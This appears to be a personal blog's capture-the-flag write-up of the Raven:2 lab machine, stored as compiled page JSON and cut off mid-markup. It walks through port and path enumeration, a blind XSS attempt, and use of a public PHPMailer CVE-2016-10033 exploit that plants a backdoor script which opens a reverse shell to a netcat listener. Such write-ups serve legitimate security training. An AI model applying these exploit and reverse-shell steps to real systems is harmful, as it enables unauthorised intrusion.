{"componentChunkName":"component---src-templates-blog-post-js","path":"/blog/raven:2-writeup/","result":{"data":{"site":{"siteMetadata":{"title":"nnfewl's Blog","author":"nnfewl"}},"mdx":{"id":"fdf9db4d-6617-5900-9a01-9144129bcb86","excerpt":"This writeup is for my OCSP preparation journey since I always fail to recollect technical details of those CTF boxes I have played, thus, I decided to make a…","body":"function _extends() { _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; }; return _extends.apply(this, arguments); }\n\nfunction _objectWithoutProperties(source, excluded) { if (source == null) return {}; var target = _objectWithoutPropertiesLoose(source, excluded); var key, i; if (Object.getOwnPropertySymbols) { var sourceSymbolKeys = Object.getOwnPropertySymbols(source); for (i = 0; i < sourceSymbolKeys.length; i++) { key = sourceSymbolKeys[i]; if (excluded.indexOf(key) >= 0) continue; if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue; target[key] = source[key]; } } return target; }\n\nfunction _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; }\n\n/* @jsx mdx */\nvar _frontmatter = {\n \"title\": \"Raven:2 Writeup\",\n \"date\": \"2020-07-08T00:00:00.000Z\"\n};\n\nvar makeShortcode = function makeShortcode(name) {\n return function MDXDefaultShortcode(props) {\n console.warn(\"Component \" + name + \" was not imported, exported, or provided by MDXProvider as global scope\");\n return mdx(\"div\", props);\n };\n};\n\nvar layoutProps = {\n _frontmatter: _frontmatter\n};\nvar MDXLayout = \"wrapper\";\nreturn function MDXContent(_ref) {\n var components = _ref.components,\n props = _objectWithoutProperties(_ref, [\"components\"]);\n\n return mdx(MDXLayout, _extends({}, layoutProps, props, {\n components: components,\n mdxType: \"MDXLayout\"\n }), mdx(\"p\", null, \"This writeup is for my OCSP preparation journey since I always fail to recollect technical details of those CTF boxes I have played, thus, I decided to make a note of my dumb approach to harden my memory on this sort of skill.\"), mdx(\"h2\", null, \"Initial contact\"), mdx(\"p\", null, \"First thing first, import target ip address into environment variables:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"export\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token assign-left variable\"\n }), \"IP\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"192.168\"), \".2.188\"))), mdx(\"p\", null, \"Scanning target open port, identify relative service.\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ nmap -sV -sC -oA nmap/raven \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token variable\"\n }), \"$IP\")))), mdx(\"p\", null, \"Result:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"Nmap scan report:\\nHost is up \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), \".000046s latency\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \".\\nNot shown: \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"997\"), \" closed ports\\nPORT STATE SERVICE VERSION\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"22\"), \"/tcp \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"open\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"ssh\"), \" OpenSSH \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"6\"), \".7p1 Debian \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"5\"), \"+deb8u4 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"protocol \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2.0\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" ssh-hostkey:\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1024\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"26\"), \":81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"DSA\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2048\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"31\"), \":58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"RSA\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"256\"), \" 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"ECDSA\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \"_ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"256\"), \" 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"ED25519\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"80\"), \"/tcp \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"open\"), \" http Apache httpd \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2.4\"), \".10 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token variable\"\n }), mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token punctuation\"\n }), \"((\"), \"Debian\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token punctuation\"\n }), \"))\")), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \"_http-server-header: Apache/2.4.10 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"Debian\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \"_http-title: Raven Security\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"111\"), \"/tcp \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"open\"), \" rpcbind \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2\"), \"-4 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"RPC \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"#100000)\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" rpcinfo:\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" program version port/proto \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"service\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"100000\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2,3\"), \",4 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"111\"), \"/tcp rpcbind\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"100000\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2,3\"), \",4 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"111\"), \"/udp rpcbind\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"100024\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"34782\"), \"/tcp status\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"|\"), \"_ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"100024\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"49203\"), \"/udp status\\nMAC Address: 08:00:27:3D:1F:5D \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), \"Oracle VirtualBox virtual NIC\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\nService Info: OS: Linux\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\"), \" CPE: cpe:/o:linux:linux_kernel\"))), mdx(\"p\", null, \"Now that I know target machine had port 22, 80, 111 opened, so typical attack path in my mind is through web application.\"), mdx(\"p\", null, \"So I open my browser and head to \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"http://192.168.2.188/\"\n }), \"http://192.168.2.188/\"), \", there\\u2019s a website; I then use cursor to hover each link element to quickly go through every endpoint, and write them down into my Cherrytree notebook.\"), mdx(\"p\", null, \"Then I have an endpoint list like this:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"http://192.168.2.188/\\nhttp://192.168.2.188/about.html\\nhttp://192.168.2.188/wordpress/\\nhttp://192.168.2.188/wordpress/wp-login.php\\nhttp://192.168.2.188/contact.php\"))), mdx(\"p\", null, \"After this, visit each endpoint one by one. I quickly noticed that several resources didn\\u2019t load up normally, use \", mdx(\"kbd\", null, \"Ctrl\"), \" + \", mdx(\"kbd\", null, \"u\"), \" to view source code to find out that it using url \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"raven.local/img/\"), \" to fetch resources like image, css file, etc, since \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"raven.local\"), \" did not have any reasonable address to point to, that why several endpoint behave abnormal. Anyway, I spotted first key informaton to proceed next move. Add this domain name into my \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/etc/hosts\"), \" file, and set it point to \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"192.168.2.188\"), \".\"), mdx(\"p\", null, \"Now, give my previous endpoint list a quick update:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"http://raven.local/\\nhttp://raven.local/about.html\\nhttp://raven.local/wordpress/\\nhttp://raven.local/wordpress/wp-login.php\\nhttp://raven.local/contact.php\"))), mdx(\"p\", null, \"At this point, besides knowing this website is built with wordpress and a wordpress admin login endpoint at \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"http://raven.local/wordpress/wp-login.php\"), \", I don\\u2019t really have any option to go other than keep doing enumeration.\"), mdx(\"p\", null, \"Use gobuster to do a path enumeration:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ gobuster \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"dir\"), \" -u http://raven.local/ -w /usr/share/dirbuster/\"))), mdx(\"p\", null, \"While gobuster is running, I tested two input forms at endpint \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/contact.php\"), \" \\u201Ccontact us\\u201D fields and \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/wordpress\"), \" blog \\u201Ccomment\\u201D fields respectively trying to pull a blind XSS attack hoping to obtain some admin cookies or credentials. And, there is no response.\"), mdx(\"h4\", null, \"Get flag1\"), mdx(\"p\", null, \"Head back to the terminal to check gobuster result, turns out there is a new path \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"vendor\"), \" spotted. Go ahead visit \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"http://raven.local/vendor/\"), \" in the browser, turns out its a PHPMailer source repository. After sieving through a couple of files, I successfully captured the first flag. There are two interesting files apparently, the first one is CHANGLOG.md, and the second one is SECURITY.md. After close scrutine, I find out that the version number of this PHPMailer is 5.2.17 and it\\u2019s vulnerable to CVE-2016-10033 RCE.\"), mdx(\"p\", null, \"Use searchexploit to query existing exploits:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ searchexploit PHPMailer\"))), mdx(\"p\", null, \"Result:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/b0b7e2b6edba1b087c41980bcca94162/75609/raven-101944.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACIklEQVQoz6WQy27TQBSG/QJWKrFI7SJKU8fj2Iljx5fxbXwbJ6ERbVLa0FadBRJILJBgAQsePp6Dxk2hYsVl8enMnMt//hkpINWzer29ry+2rDm/ZvOLLZtfvGXN+ZYtN7fs7M0d29y9Y1fsPVtd33e55eaGLS9v2avLu47F5oaxD5/uv3z73pc0TaerkkJTNpAWFLKCQprXQKo5BFEKXhgDTgjEWQ5BlHR3kffxw9nHcRcTUoDr+WvpuXpEsetBMPN2k4m9syyrNU2zHY/HrTkyW8MwOhBCrYEezrZtt5Y1fszvDMPY6boO/X5/LbkDjX4uG1iFEXdmHo+TjJO84hkpeEoKnpGyi7qu8+FwyI3RiKdZzmmz5GXV8ChORa0VgurR0VqanAzox7yGZYC56/k8DCPIixqSlEBGCoiSFHCUgOO4MJ7YYIxGECcZVPUcioqKHm5PHbEMVFVdS7OBRr/WC3iNY+76gdjYNaZZ3omKYcedQRBGXTQtCzJSwnyxgoouOsG9e1AUZS1pL0/oWZpDGmAehpgvcAwkwDDzfMA4hlB8uh90CEF76nSOhahYGASYI4QEDw6PXxzTIowgDSM+dVxu21NAug76E0TzU0ROONrXOULGL0FFUaiJEIwQ6j79H2l/PlkIasMhDPfb9N/c/QH8cU5V1Y10eHhYnZ6egqZpAr6Pf4OY4UJDUZRzSZZl+eDggPR6vfJ/EBqyLPd+AMbTRhU04iIjAAAAAElFTkSuQmCC')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"result\",\n \"title\": \"result\",\n \"src\": \"/static/b0b7e2b6edba1b087c41980bcca94162/fcda8/raven-101944.png\",\n \"srcSet\": [\"/static/b0b7e2b6edba1b087c41980bcca94162/12f09/raven-101944.png 148w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/e4a3f/raven-101944.png 295w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/fcda8/raven-101944.png 590w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/efc66/raven-101944.png 885w\", \"/static/b0b7e2b6edba1b087c41980bcca94162/75609/raven-101944.png 994w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"It gives out several exploits, copy them into my current folder:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ searchexploit -m php/webapps/40974.py\"))), mdx(\"p\", null, \"First of all, \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"cat 40974.py\"), \" to have a overall grasp about the exploits.\"), mdx(\"p\", null, \"There is a couple of place need to change for our exploitation:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"python\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-python\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-python\"\n }), \"target \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'http://192.168.2.188/contact.php'\"), \"\\nbackdoor \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"'/hello.php'\"), \"\\n\\npayload \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"=\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"''\")))), mdx(\"p\", null, \"In a nutshell, all this exploit will do is create a backdoor php script named \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"hello.php\"), \" under \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/var/www/html/\"), \", which can be accessed through \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"http://raven.local/hello.php\"\n }), \"http://raven.local/hello.php\"), \". So each time a request hits \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"hello.php\"), \", it will launch a reverse shell connect back to a specific ip address. As you can see, payload default configuration is \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"192.168.2.187\"), \", I gonna change it to my kali machine\\u2019s ip address which is \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"192.168.2.56\"), \".\"), mdx(\"p\", null, \"Set a netcat receiver before executing this exploit and waiting for connection:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"nc\"), \" -lvnp \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"433\")))), mdx(\"p\", null, \"Before execution, this script does have two dependencies to install, better use python venv to separate it from default python.\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ python3 -m venv pwn\"))), mdx(\"p\", null, \"This will create a folder named \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"pwn\"), \", and it will contain a copy of your machine\\u2019s python environment. When it\\u2019s activated, and I can install whatever dependency I encountered, it will not pollute my default python environment.\"), mdx(\"p\", null, \"With that being said, activate this virtual environment:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"source\"), \" pwn/bin/activate\"))), mdx(\"p\", null, \"Install dependency:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ python3 -m pip \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"install\"), \" requests_toolbelt lxml\"))), mdx(\"p\", null, \"Code:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/350de/raven-111939.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAChklEQVQoz3WS22/TMBTGK21sa6Z1D0gspZ1EL4ntJM7FaZx7ura7ANrWDTRWIEzskf+AFx74tyHxQXEZAk08/PQd2/Ln7+i4FeSzpy/frD6eXq/K49c35fH5TTl/9bY8vbwtz65uy4ubu/L6/X15tfpcXr67K08ub8vT5Zqz5ao8u1qVJxc35Yf7L5++fvuutgaj8SLOCsimc8hO55DOZzB9eQJRUYAfxhDlBcTFFOK8gCjLYRInECQpBEki6wY/iiE7mgGPomVLPVAXxMBg2KRyU6eizKq9yK2JQ+qxrtWEohqZeo0MvUZEr7GJakKxBFuoocIW/oktBGpXXbb6/cOFaZpgWZbwJp5wmCv8wBcBDwSlVBCTrLH+VYSQ0DRdomt6pes69Hv9ZavX6y0sywLbtgW1qaAOBdd1YRJMwGY2mK4JhmOssQ25Nj0TsIFB0zTQdV3oul43hr1eb9nqdrsL27GBMSacwBFsysDmNrCIAU85eMwDTDAgggCbWNbj0fjBrNHHhoZhyJaJQYS8ZGIglKyx1hj0d0pqSKMHHhuqBwtiULC9iWDcE0EaQFzEEKYR8JiDH/nNY+tUY03yt+GjllX12cIwKPhBJMIsrONZLI4WucjnmRwMz7jgKZcDatL8BzmU543hgaoehzwEHqaQ5DnwOIAkm4DtUGDMB9dxofkFDQghwBgDIUTqHwipGz3s96+aKR/leV67nlc5jlMhjKrBcFgNh8NqPB5Vo9GoGgwGVZOiOWeMVUVRVJzzyvd9qTwMfzg2BaK9OG8pirK7sbERttvtVFGUZG9vL9nf35d0Oh1JUzf77XY72dnZSTY3N5Pt7W1ZN7q1tZUoym78ZEfp/AK+lj/jFAWdVgAAAABJRU5ErkJggg==')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"code\",\n \"title\": \"code\",\n \"src\": \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/fcda8/raven-111939.png\",\n \"srcSet\": [\"/static/d863d6bf76a35b89ff4e18d0c71ec10b/12f09/raven-111939.png 148w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/e4a3f/raven-111939.png 295w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/fcda8/raven-111939.png 590w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/efc66/raven-111939.png 885w\", \"/static/d863d6bf76a35b89ff4e18d0c71ec10b/350de/raven-111939.png 998w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": 